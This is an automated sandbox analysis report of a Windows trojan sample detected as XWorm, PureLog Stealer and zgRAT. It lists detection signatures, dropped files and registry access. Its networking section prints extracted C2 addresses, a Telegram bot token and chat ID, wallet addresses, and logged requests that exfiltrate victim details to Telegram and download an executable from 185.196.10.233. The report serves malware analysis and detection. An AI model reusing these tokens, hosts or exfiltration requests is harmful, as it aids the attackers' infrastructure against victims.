Windows Analysis Report
9NBx4Vmiuj.exe

Overview

General Information

Sample name: 9NBx4Vmiuj.exe
renamed because original name is a hash value
Original sample name: 1d562eaa3e33451a40f60c976c6f4bc0.exe
Analysis ID: 1416004
MD5: 1d562eaa3e33451a40f60c976c6f4bc0
SHA1: de0f3e027e12162388ec953936857f06b71487ca
SHA256: dde68755fa515158e01e3e8f2b90772dc86e25b7e2684fc5066a5e33ee22b614
Tags: 64, exe, trojan

Detection

PureLog Stealer, XWorm, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Telegram RAT
Yara detected XWorm
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Yara detected PersistenceViaHiddenTask
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file name differs from the original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

AV Detection

Source: 9NBx4Vmiuj.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://185.196.10.233/dggfsff.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\ProgramData\btjxg.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: btjxg.exe.1784.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage"}
Source: C:\ProgramData\btjxg.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe ReversingLabs: Detection: 55%
Source: 9NBx4Vmiuj.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Joe Sandbox ML: detected
Source: C:\ProgramData\btjxg.exe Joe Sandbox ML: detected
Source: 9NBx4Vmiuj.exe Joe Sandbox ML: detected
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: 157.254.223.19
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: 8081
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: private@123
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: <Xwormmm>
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: USB.exe
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: bc1qvnmel0wr7n7xam2jq9cd6v9kq9ll0fc3ps5j2p
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: 0x459d192EF8f2288915a6aA1A6F2f9685A42dd7e4
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: TRDyFoJLpPN2oCCX4ANzpcEiJJiZSR9uZQ
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: 5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack String decryptor: 1267602057
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49794 version: TLS 1.2
Source: 9NBx4Vmiuj.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Pjraflkwkhj.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 00000002.00000002.2158779274.000002184E741000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3409147293.000001E3C9781000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2610110087.0000020937261000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Networking

Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 157.254.223.19:8081 -> 192.168.2.5:49797
Source: global traffic TCP traffic: 185.196.10.233 ports 39001,0,1,3,80,9
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\btjxg.exe, type: DROPPED
Source: global traffic TCP traffic: 192.168.2.5:49726 -> 185.196.10.233:39001
Source: global traffic TCP traffic: 192.168.2.5:49797 -> 157.254.223.19:8081
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Mar 2024 17:23:16 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 25 Mar 2024 19:48:20 GMTETag: "25200-6148174a2032a"Accept-Ranges: bytesContent-Length: 152064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: GET /bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=1267602057&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A9FCA14390BF6B97E9DB7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dggfsff.exe HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View ASN Name: TECHNICOLORUS TECHNICOLORUS
Source: Joe Sandbox View ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: gjhfhgdg.insane.wang
Source: RegSvcs.exe, 00000003.00000002.3376937115.000001E3B95A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.196.10.233/dggfsff.exe
Source: btjxg.exe, 00000004.00000002.3374102569.000000000316E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 0000000D.00000002.2821942479.000002801EE5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000A.00000002.2555794283.000001ECF40A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000005.00000002.2367987837.000002AEC8A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2133348072.00000234352C0000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2135768597.000002343558D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 00000005.00000002.2314219862.000002AEB8C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CCE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3376937115.000001E3B9201000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3376937115.000001E3B94D8000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2314219862.000002AEB8A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.00000280069E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2314219862.000002AEB8C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2314219862.000002AEB8A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.00000280069E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegrP
Source: btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: btjxg.exe, 00000004.00000002.3366251779.0000000001312000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: RegSvcs.exe, 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, btjxg.exe.3.dr, btjxg.exe.4.dr String found in binary or memory: https://api.telegram.org/bot
Source: btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=12676
Source: powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2158779274.000002184EA06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3409147293.000001E3C9A46000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2610110087.0000020937526000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000005.00000002.2367987837.000002AEC8A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
